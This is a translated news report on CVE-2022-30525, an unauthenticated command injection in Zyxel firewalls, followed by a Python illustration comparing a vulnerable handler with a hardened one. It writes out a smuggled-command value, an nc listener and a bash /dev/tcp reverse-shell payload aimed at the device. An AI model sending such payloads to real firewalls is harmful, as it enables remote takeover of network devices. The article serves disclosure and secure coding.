Vulnerability in Zyxel firewalls allowing code execution without authentication

A critical vulnerability (CVE-2022-30525) has been found in Zyxel devices of the ATP, VPN and USG FLEX series, which are designed to provide firewall, IDS and VPN functions in enterprises. It allows an external attacker to execute code on the device without user privileges and without authentication. To carry out the attack, the attacker must be able to send requests to the device over HTTP/HTTPS. Zyxel fixed the vulnerability in the ZLD 5.30 firmware update. According to the Shodan service, there are currently 16213 potentially vulnerable devices on the global network that accept requests over HTTP/HTTPS.

The attack is carried out by sending specially crafted commands to the /ztp/cgi-bin/handler web handler, which is reachable without authentication. The problem is caused by the lack of proper sanitization of request parameters before they are used to run commands on the system through an os.system call in the lib_wan_settings.py library, which is executed when the setWanPortSt operation is handled.

For example, an attacker can pass the string "; ping 192.168.1.210;", which leads to the execution of the command "ping 192.168.1.210" on the system. To obtain a command shell, one can run "nc -lvnp 1270" on one's own system and then initiate a reverse connection by sending a request to the device containing '; bash -c \"exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\";'.
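As an added illustration (not Zyxel's code, which is not reproduced here), the unsafe pattern described above is shown beside a hardened form: a hypothetical handler that splices a request parameter into a shell string of the kind handed to os.system, versus one that validates the value against a strict allowlist and passes an argument vector with no shell involved. The command path, the parameter name and the allowlist pattern are assumptions, and the sample values are constructed.

```python
import re
import shlex
import subprocess
from typing import List

# Constructed sample values: a plausible WAN port name, and the same
# parameter carrying an injected second command of the shape quoted above.
BENIGN_PORT = "wan1"
INJECTED_PORT = "wan1; ping 192.168.1.210;"

# Hypothetical command the handler wants to run; not the real device command.
TOOL = "/sbin/ifconfig"


def build_shell_command_vulnerable(port: str) -> str:
    """Unsafe pattern: the request parameter is spliced into a command line
    that would then be passed to os.system(). The string is returned rather
    than executed so the effect of the injection can be inspected."""
    return "%s %s up" % (TOOL, port)


def shell_tokens(command: str) -> List[str]:
    """Tokenize a command line the way a shell would, treating ';' as an
    operator, so an injected second command becomes visible."""
    return list(shlex.shlex(command, punctuation_chars=True))


def is_valid_port_name(port: str) -> bool:
    """Allowlist check (assumed policy): a short identifier made only of
    letters, digits and underscores, starting with a letter."""
    return re.fullmatch(r"[A-Za-z][A-Za-z0-9_]{0,15}", port) is not None


def set_wan_port_hardened(port: str, execute: bool = False) -> List[str]:
    """Hardened form: reject anything outside the allowlist, then run the
    tool with an argument vector and no shell, so shell metacharacters in
    the parameter are never interpreted. Returns the argv that would run."""
    if not is_valid_port_name(port):
        raise ValueError("rejected WAN port name: %r" % port)
    argv = [TOOL, port, "up"]
    if execute:
        subprocess.run(argv, check=True)  # no shell=True, no string building
    return argv
```

With the injected value, shell_tokens() on the vulnerable command line contains a standalone ";" token followed by "ping", while the hardened function refuses the value before any command is built.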

Source: opennet.ru
